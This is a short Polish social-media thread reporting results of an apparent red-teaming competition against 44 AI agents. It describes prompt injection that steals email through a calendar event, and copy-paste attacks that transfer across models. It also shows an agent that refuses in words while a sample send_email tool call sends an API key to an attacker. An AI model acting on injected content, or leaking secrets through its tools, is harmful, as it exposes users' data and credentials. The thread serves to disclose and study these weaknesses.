Wdrożyliśmy 44 agentów AI i zaoferowaliśmy internetowi 170 tys. dolarów za ich zaatakowanie. 1,8 mln prób, 62 tys. naruszeń, w tym wycieki danych i straty finansowe. 🚨 Niepokojące jest to, że te same exploity przenoszą się na agentów produkcyjnych na żywo… (przykład: wykradanie e-maili przez wydarzenie w kalendarzu) 🧵
Wiele przerw jest uniwersalnych i przenośnych. Wzory kopiuj-wklej działały w różnych zadaniach, modelach i zabezpieczeniach. Jeśli dzisiaj zepsuje jednego agenta, prawdopodobnie zepsuje również twojego.
Ulubiona porażka: „odmów w tekście, działaj w narzędziach.” 😈 Model: „Nie mogę podzielić się poświadczeniami.” Następnie: send_email(to=atakujący, body="API_KEY=****") Interfejs użytkownika wygląda na bezpieczny; warstwa narzędziowa wyrządza szkody.
489,95K